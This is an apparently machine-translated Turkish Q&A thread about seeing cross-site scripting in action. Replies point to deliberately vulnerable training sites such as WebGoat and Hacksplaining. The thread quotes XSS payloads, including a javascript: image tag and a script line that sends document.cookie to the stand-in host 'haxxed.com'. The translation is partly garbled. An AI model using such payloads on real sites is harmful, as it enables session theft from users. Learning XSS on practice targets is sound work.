Birisi tarayıcımda etkin olarak bana bir Cross-site scripting saldırısı gösterebilir mi? İnternette bunu yapan bir örnek var mı? Bunu internette bulamadım.Çapraz site komut dosyası saldırısının basit bir örneği
Daha basit olan örnek daha iyidir.
http://www.insecurelabs.org ve arama alanına ve diğer bazı yerlerde XSS için Kasıtlı olarak savunmasız
http://www.insecurelabs.org/task/ bakınız.
Genelde canlı bir XSS örneği için kendi sunucu tarafı yazılımınızı yüklemeniz gerekir. Pek çok meşru site, web sörfçülerine kasıtlı olarak bir XSS hatası açacaktır.
Kendinize XSS (diğer pek çok şey arasında) gösterebilmenizi sağlayan hazır bir sunucu tarafı yazılım parçası, OWASP Web Gezgini'dir. İşte instructions to install WebGoat and demonstrate XSS. OSSASP makalesinde "Cross-site scripting (XSS)" makalesinde XSS'yi etkinleştiren ek program parçacıkları örnekleri bulacaksınız.
<img src="javascript:alert('hello everybody')"></img> Eklediğim resim etiketi xss örneğidir. Yukarıdaki src sizi uyaran java betiğini içerir.
Bu hiçbir şey yapmıyor! –
Basit Biçim de şu şekilde olurdu: Eğer ileti kutusu, sayfanın veya sunucunun savunmasız olduğunu gösterir.
<script>window.location = 'haxxed.com? cookie=' + document.cookie</script>
teknik çalışmaları burada bulabilirsiniz nasıl büyük bir örnek https://www.hacksplaining.com/exercises/xss-stored
Tip ve Evet bana –
uyarır, ama mesele bütün ortaya çıkarmak için değil burada böcek. Ve kesinlikle bundan daha fazlası var. – Erlend